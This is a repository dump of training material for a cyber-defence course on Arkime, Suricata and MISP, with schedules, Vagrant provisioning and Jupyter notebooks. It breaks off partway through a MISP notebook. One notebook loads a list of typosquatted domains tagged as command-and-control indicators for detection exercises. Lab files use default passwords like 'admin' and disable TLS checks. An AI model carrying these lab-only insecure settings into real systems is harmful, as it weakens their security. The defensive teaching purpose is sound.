├── .gitignore ├── Arkime ├── README.md ├── clustering │ ├── 000-parliament.ipynb │ ├── README.md │ └── Vagrantfile ├── misp_wise │ ├── 000-wise-recap.ipynb │ ├── 001-MISP-Samples.ipynb │ ├── 002-MISP-Populate.ipynb │ └── README.md ├── package_setup │ ├── README.md │ └── Vagrantfile ├── pikksilm │ └── README.md ├── polarproxy │ └── README.md ├── prepare-laptop.md ├── queries │ ├── 000-moloch-api.ipynb │ ├── 001-conn-ela.ipynb │ ├── 002-uniq-and-sessions.ipynb │ ├── 003-export-pcap.ipynb │ ├── 004-tagging.ipynb │ ├── README.md │ ├── Vagrantfile │ └── provision.sh ├── setup │ ├── README.md │ ├── Vagrantfile │ └── build-freebsd.md ├── suricata │ └── README.md ├── tuning │ ├── README.md │ ├── Vagrantfile │ └── provision.sh └── wise │ ├── README.md │ ├── Vagrantfile │ └── provision.sh ├── LICENSE ├── README.md ├── Suricata ├── README.md ├── build │ ├── README.md │ ├── hyperscan.md │ └── intro.md ├── config │ └── README.md ├── data-exploration │ ├── 001-load-eve.ipynb │ ├── 999-tasks.ipynb │ ├── README.md │ └── eve.json ├── datasets │ └── README.md ├── docker │ ├── dalton │ │ ├── build.sh │ │ └── stop.sh │ └── redisLogging │ │ ├── docker-compose.yml │ │ └── logstash-redis-ela.conf ├── ebpf │ └── README.md ├── elastic-cluster │ └── README.md ├── elastic-log-shipping │ ├── 000-bulk-eve.ipynb │ ├── 000-bulk-intro.ipynb │ ├── README.md │ └── syslog.md ├── elastic │ └── README.md ├── eve │ └── README.md ├── frontend │ └── README.md ├── intro │ └── README.md ├── ips │ ├── README.md │ └── exercises.md ├── live │ └── README.md ├── lua │ ├── README.md │ ├── provision.sh │ ├── stats2influxdb.lua │ ├── stats2influxdb.md │ └── stats2influxdb_onelongline.lua ├── rules │ └── README.md ├── rulesets │ ├── 000-explore-rulesets.ipynb │ └── README.md ├── selks │ ├── README.md │ └── hunt-pcap-read.png ├── suricata-update │ └── README.md ├── unix-socket │ └── README.md └── vagrant │ ├── README.md │ ├── day1 │ ├── Vagrantfile │ └── provision.sh │ ├── day2 │ └── Vagrantfile │ └── day3 │ └── Vagrantfile ├── common ├── Closing.md ├── GoHello.md ├── SetUpGoLang.md ├── certstream-mining.md ├── day_intro.md ├── docker │ └── README.md ├── elastic │ ├── README.md │ ├── docker-compose.yml │ ├── elastic.api.md │ ├── elastic.config.basic.md │ ├── elastic.config.example.md │ ├── elastic.ingest.md │ ├── elastic.install.md │ ├── elastic.mappings.md │ ├── kibana.install.md │ ├── kibana.queries.md │ └── logstash-redis-ela.conf └── vagrant │ ├── README.md │ ├── Vagrantfile │ └── scripts │ ├── install-salt-minion.sh │ └── install-telegraf.sh ├── data ├── README.md ├── download-public-sources.sh └── source-mta-pcap.txt ├── prerequisites └── README.md ├── saynomore.png └── singlehost ├── README.md ├── Vagrantfile ├── export.ndjson ├── grafana-provision ├── Containers-1554370521612.json ├── NIC-1554373671497.json ├── Resources-1554370481064.json └── elasticsearch-1554374529889.json ├── intro.md └── provision.sh /.gitignore: -------------------------------------------------------------------------------- 1 | *.dat 2 | *.zip 3 | *.csv 4 | *.deb 5 | *.gz 6 | *.log 7 | *.dump 8 | *.pcap 9 | *.cap 10 | *.swp 11 | *.bak 12 | *.tgz 13 | *.run 14 | 15 | # Build and Release Folders 16 | src/ 17 | pkg/ 18 | bin/ 19 | bin-debug/ 20 | bin-release/ 21 | [Oo]bj/ # FlashDevelop obj 22 | [Bb]in/ # FlashDevelop bin 23 | 24 | # R specifics 25 | **/R/* 26 | **/.RStudio 27 | **/lib/* 28 | **/.rstudio-desktop/* 29 | **/.rstudio/* 30 | **/.config/* 31 | **/.nv/* 32 | **/.cache/* 33 | **/.jupyter/* 34 | **/.local/* 35 | **/.ipynb_checkpoints/* 36 | 37 | # Other files and folders 38 | .settings/ 39 | .vagrant/ 40 | students/ 41 | 42 | # Executables 43 | *.swf 44 | *.air 45 | *.ipa 46 | *.apk 47 | 48 | # Project files, i.e. `.project`, `.actionScriptProperties` and `.flexProperties` 49 | # should NOT be excluded as they contain compiler settings and other important 50 | # information for Eclipse / Flash Builder. 51 | 52 | ltmain.sh 53 | 54 | # nested git repos 55 | Suricata/docker/dalton/dalton/ 56 | 57 | # stuff that will be worked on during class 58 | Suricata/vagrant/multihost/states/top.sls 59 | Suricata/vagrant/multihost/states/test.sls 60 | Suricata/vagrant/multihost/pillar 61 | 62 | .venv/* 63 | venv/* 64 | 65 | # suricata rules 66 | *.rules 67 | 68 | # Lua scripts written as example or test 69 | *.lua 70 | -------------------------------------------------------------------------------- /Arkime/README.md: -------------------------------------------------------------------------------- 1 | 2 | This material has been designed to be taught in a [classroom](https://ccdcoe.org/training/cyber-defence-monitoring-course-large-scale-packet-capture-analysis-june-2024/) environment... hands-on 80% + talk 40% + **slides 0%** = 120% hard work 3 | 4 | **The online material is missing some of the contextual concepts and ideas that will be covered in class.** 5 | 6 | This is **4 days** of material for any intermediate-level dev-ops who has some experience with other security|monitoring tools and wants to learn Arkime. We believe these classes are perfect for anyone who wants a jump start in learning Arkime or who wants a more thorough understanding of it internals. 7 | 8 | ### Arkime is a large scale, open source, full packet capturing, indexing, and database system. 9 | 10 | > Arkime was formerly named **Moloch**, so the materials on this site may still refer to it as Moloch in various ways or forms. Same holds true for the Arkime codebase. 11 | 12 | > Arkime is not meant to replace Intrusion Detection Systems (IDS). Arkime augments your current security infrastructure by storing and indexing network traffic in standard PCAP format, while also providing fast indexed access. 13 | 14 | **NB! Provided timeline is preliminary and will develop according to the actual progress of the class. On-site participation only.** 15 | 16 | ## Day -1 :: Intro, singlehost, basic Viewer usage :: June 3 2024, *starts at 13:00!* 17 | 18 | * 12:30 Registration open, coffee 19 | 20 | * 13:00 - 17:00 21 | * [Intro](/common/day_intro.md) 22 | * [Singlehost](/singlehost/) 23 | * LS24 overview 24 | * [Basic viewer and queries](/Arkime/queries/#using-the-viewer) 25 | * Intro to LS24 data capture 26 | 27 | ## Day 1 :: Install, basic configuration :: June 4 2024 28 | 29 | * 09:30 - 12:30 30 | * [Arkime setup](/Arkime/package_setup/) 31 | * [basic config](/Arkime/setup/#Config) 32 | * 13:30 - 17:00 33 | * [Hunting - RT Web](/Arkime/queries/#hunting-trip) 34 | 35 | ## Day 2 :: Advanced configuration, enrichment :: June 5 2024 36 | 37 | * 09:30 - 12:30 38 | * [Arkime setup, adding new fields](/Arkime/package_setup/) 39 | * 13:30 - 17:00 40 | * [MISP integration](/Arkime/misp_wise/) 41 | * [Suricata integration](/Arkime/suricata/) 42 | * [Suricata](/Suricata) 43 | 44 | ## Day 3 :: Suricata, SSL/TLS proxy :: June 6 2024 45 | 46 | * 09:30 - 12:30 47 | * [Suricata rules](/Suricata/rules), [suricata-update](/Suricata/suricata-update) 48 | * [Suricata datasets](/Suricata/datasets) 49 | * 13:30 - 17:00 50 | * [Hunting - RT client side](/Arkime/queries/#hunting-trip) 51 | * [Polarproxy](/Arkime/polarproxy) 52 | 53 | ## Day +1 :: Last but not least :: June 7 2024, *ends at 12:00* 54 | 55 | * 09:30 - 10:30 56 | * [Hunting - RT Net](/Arkime/queries/#hunting-trip) 57 | * 11:00 - 12:00 58 | * [feedback, contact exchange, thanks, etc.](/common/Closing.md) 59 | 60 | 61 | ## Orphan topics, topics from previous iterations that we might or might not cover 62 | 63 | * Splitting LS BT traffic 64 | * [build from source](/Arkime/setup/#Build) 65 | * [Pikksilm](/Arkime/pikksilm) 66 | * [WISE - Plugins](/Arkime/wise#writing-a-wise-plugin) 67 | * [Clustered elastic](/Arkime/clustering#clustered-elasticsearch), [multinode](/Arkime/clustering#moloch-workers) 68 | * [Clustering teamwork, cont](/Arkime/clustering) 69 | * [evebox](/Suricata/indexing#evebox), [scirius](/Suricata/indexing#scirius), [kibana](/Suricata/indexing#kibana) 70 | 71 | ## For trying out locally -- *not needed for classroom!* 72 | 73 | * [vagrant](/common/vagrant/), [docker](/common/docker) 74 | * [Prepare local environment](/Arkime/prepare-laptop.md) 75 | 76 | ---- 77 | 78 | # Before You Come To Class 79 | 80 | * browse trough ... 81 | * [Arkime](https://arkime.com/) 82 | * [Arkime in GitHub](https://github.com/arkime/arkime) 83 | * [Arkime FAQ](https://arkime.com/faq) 84 | * [Arkime learn](https://arkime.com/learn) 85 | * [InfoSec matters - Arkime FPC](http://blog.infosecmatters.net/2017/05/moloch-fpc.html) 86 | -------------------------------------------------------------------------------- /Arkime/clustering/000-parliament.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "code", 5 | "execution_count": 28, 6 | "metadata": {}, 7 | "outputs": [], 8 | "source": [ 9 | "import requests" 10 | ] 11 | }, 12 | { 13 | "cell_type": "code", 14 | "execution_count": 24, 15 | "metadata": {}, 16 | "outputs": [], 17 | "source": [ 18 | "r = requests.put(\"http://localhost:8008/parliament/api/auth/update\", data={\n", 19 | " \"newPassword\": \"admin\"\n", 20 | "})" 21 | ] 22 | }, 23 | { 24 | "cell_type": "code", 25 | "execution_count": 25, 26 | "metadata": {}, 27 | "outputs": [], 28 | "source": [ 29 | "respData = r.content.decode(\"utf-8\")" 30 | ] 31 | }, 32 | { 33 | "cell_type": "code", 34 | "execution_count": 26, 35 | "metadata": {}, 36 | "outputs": [ 37 | { 38 | "data": { 39 | "text/plain": [ 40 | "{'success': True,\n", 41 | " 'text': \"Here's your new token!\",\n", 42 | " 'token': 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG1pbiI6dHJ1ZSwiaWF0IjoxNTU4MDk1MzYzLCJleHAiOjE1NTgxODE3NjN9.aX1F_vbvJAUCGGb4pgsMcY89A1foYZ-i0vOxmvAyArw'}" 43 | ] 44 | }, 45 | "execution_count": 26, 46 | "metadata": {}, 47 | "output_type": "execute_result" 48 | } 49 | ], 50 | "source": [ 51 | "import json\n", 52 | "respDataObj = json.loads(respData)\n", 53 | "respDataObj" 54 | ] 55 | }, 56 | { 57 | "cell_type": "code", 58 | "execution_count": 27, 59 | "metadata": {}, 60 | "outputs": [ 61 | { 62 | "data": { 63 | "text/plain": [ 64 | "'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG1pbiI6dHJ1ZSwiaWF0IjoxNTU4MDk1MzYzLCJleHAiOjE1NTgxODE3NjN9.aX1F_vbvJAUCGGb4pgsMcY89A1foYZ-i0vOxmvAyArw'" 65 | ] 66 | }, 67 | "execution_count": 27, 68 | "metadata": {}, 69 | "output_type": "execute_result" 70 | } 71 | ], 72 | "source": [ 73 | "token = respDataObj[\"token\"]\n", 74 | "token" 75 | ] 76 | }, 77 | { 78 | "cell_type": "code", 79 | "execution_count": 36, 80 | "metadata": {}, 81 | "outputs": [], 82 | "source": [ 83 | "r = requests.post(url = \"http://localhost:8008/parliament/api/groups\", json = {\n", 84 | " \"token\": token,\n", 85 | " \"title\": \"test123\"\n", 86 | "})\n", 87 | "respData2 = r.content.decode(\"utf-8\")\n", 88 | "print(respData2)\n", 89 | "respData2Obj = json.loads(respData2)" 90 | ] 91 | }, 92 | { 93 | "cell_type": "code", 94 | "execution_count": 40, 95 | "metadata": {}, 96 | "outputs": [ 97 | { 98 | "data": { 99 | "text/plain": [ 100 | "0" 101 | ] 102 | }, 103 | "execution_count": 40, 104 | "metadata": {}, 105 | "output_type": "execute_result" 106 | } 107 | ], 108 | "source": [ 109 | "createdGroupId = respData2Obj[\"group\"][\"id\"]\n", 110 | "createdGroupId" 111 | ] 112 | }, 113 | { 114 | "cell_type": "code", 115 | "execution_count": 42, 116 | "metadata": {}, 117 | "outputs": [ 118 | { 119 | "name": "stdout", 120 | "output_type": "stream", 121 | "text": [ 122 | "{\"success\":true,\"cluster\":{\"title\":\"localbox\",\"url\":\"http://localhost:8005\",\"id\":0,\"status\":\"green\",\"totalNodes\":1,\"dataNodes\":1,\"deltaBPS\":2210,\"deltaTDPS\":0,\"molochNodes\":1,\"monitoring\":39},\"parliament\":{\"version\":2,\"groups\":[{\"title\":\"test123\",\"id\":0,\"clusters\":[{\"title\":\"localbox\",\"url\":\"http://localhost:8005\",\"id\":0,\"status\":\"green\",\"totalNodes\":1,\"dataNodes\":1,\"deltaBPS\":2210,\"deltaTDPS\":0,\"molochNodes\":1,\"monitoring\":39}]}],\"settings\":{\"general\":{\"noPackets\":0,\"noPacketsLength\":10,\"outOfDate\":30,\"esQueryTimeout\":5,\"removeIssuesAfter\":60,\"removeAcknowledgedAfter\":15,\"hostname\":\"moloch-cluster-student-box-1\"},\"notifiers\":{\"slack\":{\"name\":\"slack\",\"fields\":{\"slackWebhookUrl\":{\"name\":\"slackWebhookUrl\",\"required\":true,\"type\":\"secret\",\"description\":\"Incoming Webhooks are a simple way to post messages from external sources into Slack.\",\"value\":\"\"}},\"alerts\":{\"esRed\":true,\"esDown\":true,\"esDropped\":true,\"outOfDate\":true,\"noPackets\":true}},\"twilio\":{\"name\":\"twilio\",\"fields\":{\"accountSid\":{\"name\":\"accountSid\",\"required\":true,\"type\":\"secret\",\"description\":\"Twilio account ID\",\"value\":\"\"},\"authToken\":{\"name\":\"authToken\",\"required\":true,\"type\":\"secret\",\"description\":\"Twilio authentication token\",\"value\":\"\"},\"toNumber\":{\"name\":\"toNumber\",\"required\":true,\"description\":\"The number to send the alert to\",\"value\":\"\"},\"fromNumber\":{\"name\":\"fromNumber\",\"required\":true,\"description\":\"The number to send the alert from\",\"value\":\"\"}},\"alerts\":{\"esRed\":true,\"esDown\":true,\"esDropped\":true,\"outOfDate\":true,\"noPackets\":true}},\"email\":{\"name\":\"email\",\"fields\":{\"secure\":{\"name\":\"secure\",\"type\":\"checkbox\",\"description\":\"Send the email securely\",\"value\":\"\"},\"host\":{\"name\":\"host\",\"required\":true,\"description\":\"Email host\",\"value\":\"\"},\"port\":{\"name\":\"port\",\"required\":true,\"description\":\"Email port\",\"value\":\"\"},\"user\":{\"name\":\"user\",\"description\":\"The username of the user sending the email\",\"value\":\"\"},\"password\":{\"name\":\"password\",\"type\":\"secret\",\"description\":\"Password of the user sending the email\",\"value\":\"\"},\"from\":{\"name\":\"from\",\"required\":true,\"description\":\"Send the email from this address\",\"value\":\"\"},\"to\":{\"name\":\"to\",\"required\":true,\"description\":\"Send the email to this address\",\"value\":\"\"},\"subject\":{\"name\":\"subject\",\"description\":\"The subject of the email (defaults to \\\"Parliament Alert\\\")\",\"value\":\"\"}},\"alerts\":{\"esRed\":true,\"esDown\":true,\"esDropped\":true,\"outOfDate\":true,\"noPackets\":true}}}},\"password\":\"$2b$13$25W7rHGYIdtl6TfLtI2P4uJfGXmY/SR8ZMip5K8NiKTGzNkGG2Ffi\"},\"text\":\"Successfully added the requested cluster.\"}\n" 123 | ] 124 | } 125 | ], 126 | "source": [ 127 | "# \"{\\\"token\\\":\\\"${token}\\\", \\\"title\\\":\\\"singlehost\\\",\\\"url\\\":\\\"http://singlehost:8005\\\"}\"\n", 128 | "r = requests.post(url = \"http://localhost:8008/parliament/api/groups/{}/clusters\".format(createdGroupId), json = {\n", 129 | " \"token\": token,\n", 130 | " \"title\": \"localbox\",\n", 131 | " \"url\": \"http://localhost:8005\"\n", 132 | "})\n", 133 | "respData3 = r.content.decode(\"utf-8\")\n", 134 | "print(respData3)" 135 | ] 136 | }, 137 | { 138 | "cell_type": "code", 139 | "execution_count": null, 140 | "metadata": {}, 141 | "outputs": [], 142 | "source": [] 143 | } 144 | ], 145 | "metadata": { 146 | "kernelspec": { 147 | "display_name": "Python 3", 148 | "language": "python", 149 | "name": "python3" 150 | }, 151 | "language_info": { 152 | "codemirror_mode": { 153 | "name": "ipython", 154 | "version": 3 155 | }, 156 | "file_extension": ".py", 157 | "mimetype": "text/x-python", 158 | "name": "python", 159 | "nbconvert_exporter": "python", 160 | "pygments_lexer": "ipython3", 161 | "version": "3.6.7" 162 | } 163 | }, 164 | "nbformat": 4, 165 | "nbformat_minor": 2 166 | } 167 | -------------------------------------------------------------------------------- /Arkime/clustering/Vagrantfile: -------------------------------------------------------------------------------- 1 | # -*- mode: ruby -*- 2 | # vi: set ft=ruby : 3 | 4 | SPLIT_DB_AND_MOLO=true 5 | NAME="student" 6 | BOXES=1 7 | MEM_PER_BOX=2048 8 | CPU_PER_BOX=4 9 | 10 | ELA_MEM=2048 11 | ELA_CPU=4 12 | 13 | if SPLIT_DB_AND_MOLO == true and MEM_PER_BOX > 2048 14 | puts "Separate elastic vm will be created. Consider reducing the amount of memory per box" 15 | end 16 | 17 | $script = <<-SCRIPT 18 | systemctl stop systemd-resolved.service 19 | echo "nameserver 1.1.1.1" > /etc/resolv.conf 20 | SCRIPT 21 | 22 | $docker = <<-SCRIPT 23 | export DEBIAN_FRONTEND=noninteractive 24 | echo 'Acquire::ForceIPv4 "true";' | sudo tee /etc/apt/apt.conf.d/99force-ipv4 25 | apt-get -qq -y install \ 26 | apt-transport-https \ 27 | ca-certificates \ 28 | curl \ 29 | gnupg-agent \ 30 | software-properties-common 31 | curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add - 32 | add-apt-repository \ 33 | "deb [arch=amd64] https://download.docker.com/linux/ubuntu \ 34 | $(lsb_release -cs) \ 35 | stable" 36 | apt-get update && apt-get install -qq -y docker-ce docker-ce-cli containerd.io 37 | systemctl enable docker.service 38 | systemctl start docker.service 39 | adduser vagrant docker 40 | SCRIPT 41 | 42 | PKGDIR="/vagrant/pkgs" 43 | WGET_PARAMS="-4 -q" 44 | MOLOCH="moloch_1.8.0-1_amd64.deb" 45 | 46 | $moloch = <<-SCRIPT 47 | FILE=/etc/sysctl.conf 48 | grep "disable_ipv6" $FILE || cat >> $FILE <> $FILE <> /vagrant/provision.log 2>&1 60 | 61 | cd #{PKGDIR} 62 | [[ -f #{MOLOCH} ]] || wget #{WGET_PARAMS} https://files.molo.ch/builds/ubuntu-18.04/#{MOLOCH} 63 | dpkg -s moloch || dpkg -i #{MOLOCH} 64 | SCRIPT 65 | 66 | $moloch_basic_config = <<-SCRIPT 67 | delim=";"; ifaces=""; for item in `ls /sys/class/net/ | egrep '^eth|ens|eno|enp'`; do ifaces+="$item$delim"; done ; ifaces=${ifaces%"$deli$delim"} 68 | delim=";"; for item in `ls /sys/class/net/ | egrep '^eth|ens|eno|enp'`; do ethtool -K $item tx off sg off gro off gso off lro off tso off ; done 69 | cd /data/moloch/etc 70 | cp config.ini.sample config.ini 71 | sed -i "s,MOLOCH_ELASTICSEARCH,192.168.56.XXX:9200,g" config.ini 72 | sed -i "s,MOLOCH_INTERFACE,$ifaces,g" config.ini 73 | sed -i "s,MOLOCH_INSTALL_DIR,/data/moloch,g" config.ini 74 | sed -i "s,MOLOCH_PASSWORD,test123,g" config.ini 75 | cd /data/moloch/bin 76 | ./moloch_update_geo.sh > /dev/null 2>&1 77 | mkdir -p /data/moloch/raw && chown nobody /data/moloch/raw 78 | 79 | SCRIPT 80 | 81 | $prep_elastic_kernel_conf = <<-SCRIPT 82 | grep "vm.max_map_count" /etc/sysctl.conf || echo "vm.max_map_count=262144" >> /etc/sysctl.conf 83 | sysctl -p 84 | SCRIPT 85 | 86 | $jupyter = <<-SCRIPT 87 | apt-get update && apt-get install -y python3 python3-pip 88 | su - vagrant -c "pip3 install --user --upgrade jupyter jupyterlab elasticsearch" 89 | su - vagrant -c "pip3 install --user --upgrade chardet" 90 | su - vagrant -c "pip3 install --user --upgrade urllib3" 91 | su - vagrant -c "mkdir ~/.jupyter" 92 | cat >> /home/vagrant/.jupyter/jupyter_notebook_config.json < /dev/null" 11 | ] 12 | }, 13 | { 14 | "cell_type": "code", 15 | "execution_count": null, 16 | "id": "e4dafc1e-d624-4029-bc1f-2e50678641f9", 17 | "metadata": {}, 18 | "outputs": [], 19 | "source": [ 20 | "import urllib3\n", 21 | "urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)" 22 | ] 23 | }, 24 | { 25 | "cell_type": "markdown", 26 | "id": "a62035cb-7a53-4cc5-a9ff-fecc8228647d", 27 | "metadata": {}, 28 | "source": [ 29 | "* **Please change the token so it would reflect the MISP server you actually use.**" 30 | ] 31 | }, 32 | { 33 | "cell_type": "code", 34 | "execution_count": null, 35 | "id": "37bf14a7-730e-4cb2-9386-7bbf4151b04d", 36 | "metadata": {}, 37 | "outputs": [], 38 | "source": [ 39 | "# This is from a local testing env, so commiting the secret for training is fine\n", 40 | "TOKEN = \"TOKEN\"\n", 41 | "HOST = \"https://192.168.56.12\"" 42 | ] 43 | }, 44 | { 45 | "cell_type": "code", 46 | "execution_count": null, 47 | "id": "75302e5c-07ec-4769-b797-d025f04580d6", 48 | "metadata": {}, 49 | "outputs": [], 50 | "source": [ 51 | "from pymisp import PyMISP" 52 | ] 53 | }, 54 | { 55 | "cell_type": "code", 56 | "execution_count": null, 57 | "id": "b6c7d279-724a-4c47-b53f-16c34a1d9e9f", 58 | "metadata": {}, 59 | "outputs": [], 60 | "source": [ 61 | "misp = PyMISP(HOST, TOKEN, False, debug=False)" 62 | ] 63 | }, 64 | { 65 | "cell_type": "code", 66 | "execution_count": null, 67 | "id": "a3bf4cb3-ea4d-4249-93d1-95807ac18091", 68 | "metadata": {}, 69 | "outputs": [], 70 | "source": [ 71 | "result = misp.search(controller='attributes', timestamp=\"1d\", type_attribute=\"domain\", category=\"Network activity\", pythonify=False)" 72 | ] 73 | }, 74 | { 75 | "cell_type": "code", 76 | "execution_count": null, 77 | "id": "f2023e94-a841-4d81-9893-a32d629c8f5a", 78 | "metadata": {}, 79 | "outputs": [], 80 | "source": [ 81 | "from IPython.display import JSON" 82 | ] 83 | }, 84 | { 85 | "cell_type": "code", 86 | "execution_count": null, 87 | "id": "04626e16-a5a0-49e1-99a4-eca4fc96608e", 88 | "metadata": {}, 89 | "outputs": [], 90 | "source": [ 91 | "JSON(result)" 92 | ] 93 | }, 94 | { 95 | "cell_type": "code", 96 | "execution_count": null, 97 | "id": "f40bb4da-cf95-45c8-8356-57a04e526f94", 98 | "metadata": {}, 99 | "outputs": [], 100 | "source": [ 101 | "import pandas as pd" 102 | ] 103 | }, 104 | { 105 | "cell_type": "code", 106 | "execution_count": null, 107 | "id": "741061e4-9626-4e53-9c00-8ff2e8e604d6", 108 | "metadata": {}, 109 | "outputs": [], 110 | "source": [ 111 | "DF = pd.json_normalize(result[\"Attribute\"])\n", 112 | "len(DF)" 113 | ] 114 | }, 115 | { 116 | "cell_type": "code", 117 | "execution_count": null, 118 | "id": "fb52a077-2dfd-487d-999b-4702f6a8df40", 119 | "metadata": {}, 120 | "outputs": [], 121 | "source": [ 122 | "DF" 123 | ] 124 | }, 125 | { 126 | "cell_type": "code", 127 | "execution_count": null, 128 | "id": "bc5d9d77-b502-49d4-a93c-9fe0d8337c97", 129 | "metadata": {}, 130 | "outputs": [], 131 | "source": [ 132 | "DF.groupby(\"type\").agg({\"value\": \"nunique\", \"event_id\": \"nunique\"})" 133 | ] 134 | }, 135 | { 136 | "cell_type": "code", 137 | "execution_count": null, 138 | "id": "4306fbf3-6aeb-4370-b94e-929fb6d8152c", 139 | "metadata": {}, 140 | "outputs": [], 141 | "source": [ 142 | "DF.groupby([\"Event.info\", \"event_id\", \"type\"]).agg({\"value\": [\"unique\", \"nunique\"]})" 143 | ] 144 | } 145 | ], 146 | "metadata": { 147 | "kernelspec": { 148 | "display_name": "Python 3 (ipykernel)", 149 | "language": "python", 150 | "name": "python3" 151 | }, 152 | "language_info": { 153 | "codemirror_mode": { 154 | "name": "ipython", 155 | "version": 3 156 | }, 157 | "file_extension": ".py", 158 | "mimetype": "text/x-python", 159 | "name": "python", 160 | "nbconvert_exporter": "python", 161 | "pygments_lexer": "ipython3", 162 | "version": "3.10.12" 163 | } 164 | }, 165 | "nbformat": 4, 166 | "nbformat_minor": 5 167 | } 168 | -------------------------------------------------------------------------------- /Arkime/misp_wise/002-MISP-Populate.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "code", 5 | "execution_count": null, 6 | "id": "5f509ce2-965c-4e61-bcd3-54410bb3e4c0", 7 | "metadata": { 8 | "tags": [] 9 | }, 10 | "outputs": [], 11 | "source": [ 12 | "%pip install pymisp > /dev/null" 13 | ] 14 | }, 15 | { 16 | "cell_type": "code", 17 | "execution_count": null, 18 | "id": "1493f901-e0dd-41ca-baae-016ce6fd906b", 19 | "metadata": { 20 | "tags": [] 21 | }, 22 | "outputs": [], 23 | "source": [ 24 | "import urllib3\n", 25 | "urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)" 26 | ] 27 | }, 28 | { 29 | "cell_type": "code", 30 | "execution_count": null, 31 | "id": "fab74a2b-9f40-4691-a2ec-2a8126caef04", 32 | "metadata": { 33 | "tags": [] 34 | }, 35 | "outputs": [], 36 | "source": [ 37 | "%pip install python-dotenv" 38 | ] 39 | }, 40 | { 41 | "cell_type": "code", 42 | "execution_count": null, 43 | "id": "09eee1fc-5203-4d76-a9e2-c7d2d64b96ff", 44 | "metadata": { 45 | "tags": [] 46 | }, 47 | "outputs": [], 48 | "source": [ 49 | "from dotenv import dotenv_values" 50 | ] 51 | }, 52 | { 53 | "cell_type": "markdown", 54 | "id": "45d1b6a4-4541-40d4-a670-0765b9805672", 55 | "metadata": {}, 56 | "source": [ 57 | "# Define MISP params" 58 | ] 59 | }, 60 | { 61 | "cell_type": "code", 62 | "execution_count": null, 63 | "id": "2fd0b2dc-f739-464c-bf4d-f44f1a99afbd", 64 | "metadata": {}, 65 | "outputs": [], 66 | "source": [ 67 | "# This is from a local testing env, so commiting the secret for training is fine\n", 68 | "TOKEN = \"TOKEN\"\n", 69 | "HOST = \"https://192.168.56.12\"" 70 | ] 71 | }, 72 | { 73 | "cell_type": "markdown", 74 | "id": "92c9a960-0f27-49ce-b988-407334d5401d", 75 | "metadata": {}, 76 | "source": [ 77 | "# Create MISP object" 78 | ] 79 | }, 80 | { 81 | "cell_type": "code", 82 | "execution_count": null, 83 | "id": "8abc0dd1-9ddf-46d4-b40a-5a320b7839fd", 84 | "metadata": { 85 | "tags": [] 86 | }, 87 | "outputs": [], 88 | "source": [ 89 | "from pymisp import ExpandedPyMISP, MISPEvent, MISPTag" 90 | ] 91 | }, 92 | { 93 | "cell_type": "code", 94 | "execution_count": null, 95 | "id": "9998812a-5d0a-46a2-8471-a883141bc2fd", 96 | "metadata": { 97 | "tags": [] 98 | }, 99 | "outputs": [], 100 | "source": [ 101 | "misp = ExpandedPyMISP(HOST, TOKEN, False, debug=False)" 102 | ] 103 | }, 104 | { 105 | "cell_type": "markdown", 106 | "id": "2cc6262d-757a-42d2-a1ab-49f23f6dbbc1", 107 | "metadata": {}, 108 | "source": [ 109 | "# Define MISP event" 110 | ] 111 | }, 112 | { 113 | "cell_type": "code", 114 | "execution_count": null, 115 | "id": "a5bd78b1-fd13-45e7-b742-2e1eb8ed64e1", 116 | "metadata": { 117 | "tags": [] 118 | }, 119 | "outputs": [], 120 | "source": [ 121 | "event = MISPEvent()\n", 122 | "event.info = \"LS 2023 Day 1 RT C2 domains\"" 123 | ] 124 | }, 125 | { 126 | "cell_type": "markdown", 127 | "id": "07f624de-76c6-4e96-aa1a-f4cd125bf8d8", 128 | "metadata": {}, 129 | "source": [ 130 | "# Create MISP event" 131 | ] 132 | }, 133 | { 134 | "cell_type": "code", 135 | "execution_count": null, 136 | "id": "a9eee7a6-61c9-4cd6-b1ce-2103e1842858", 137 | "metadata": { 138 | "tags": [] 139 | }, 140 | "outputs": [], 141 | "source": [ 142 | "result = misp.add_event(event=event, pythonify=True)" 143 | ] 144 | }, 145 | { 146 | "cell_type": "markdown", 147 | "id": "1bbf9770-3bb2-438f-ba47-93002a341ae1", 148 | "metadata": { 149 | "tags": [] 150 | }, 151 | "source": [ 152 | "# Define IoC values and buffer them for upload" 153 | ] 154 | }, 155 | { 156 | "cell_type": "code", 157 | "execution_count": null, 158 | "id": "ac058855-df11-4acd-9f0a-3191496cf6e8", 159 | "metadata": { 160 | "tags": [] 161 | }, 162 | "outputs": [], 163 | "source": [ 164 | "IOC = \"\"\"\n", 165 | "gstatlc.net\n", 166 | "scdn.co.uk\n", 167 | "rnicrosoftonline.net\n", 168 | "mozllla.com\n", 169 | "awsamazon.eu\n", 170 | "msn365.org\n", 171 | "\"\"\".split()" 172 | ] 173 | }, 174 | { 175 | "cell_type": "code", 176 | "execution_count": null, 177 | "id": "380c7b23-ab71-4cea-8cfc-efccd0d29732", 178 | "metadata": { 179 | "tags": [] 180 | }, 181 | "outputs": [], 182 | "source": [ 183 | "IOC" 184 | ] 185 | }, 186 | { 187 | "cell_type": "code", 188 | "execution_count": null, 189 | "id": "086bba5a-c80d-4c1d-9cc3-6df5970e76eb", 190 | "metadata": {}, 191 | "outputs": [], 192 | "source": [ 193 | "for ioc in IOC:\n", 194 | " tag = MISPTag()\n", 195 | " tag.from_dict(name=\"kill-chain:\\\"Command and Control\\\"\")\n", 196 | " result.add_attribute(type=\"domain\", \n", 197 | " value=ioc,\n", 198 | " tags=[tag])" 199 | ] 200 | }, 201 | { 202 | "cell_type": "markdown", 203 | "id": "1c0e8036-dc77-4860-9844-701874dda33e", 204 | "metadata": {}, 205 | "source": [ 206 | "# Bulk update event" 207 | ] 208 | }, 209 | { 210 | "cell_type": "code", 211 | "execution_count": null, 212 | "id": "3fd1aaff-06e0-484d-81f8-c6e0c3f7639b", 213 | "metadata": { 214 | "tags": [] 215 | }, 216 | "outputs": [], 217 | "source": [ 218 | "import pandas as pd" 219 | ] 220 | }, 221 | { 222 | "cell_type": "code", 223 | "execution_count": null, 224 | "id": "84a5b36d-7fcd-4df6-8b6e-d9990aee5fa2", 225 | "metadata": { 226 | "tags": [] 227 | }, 228 | 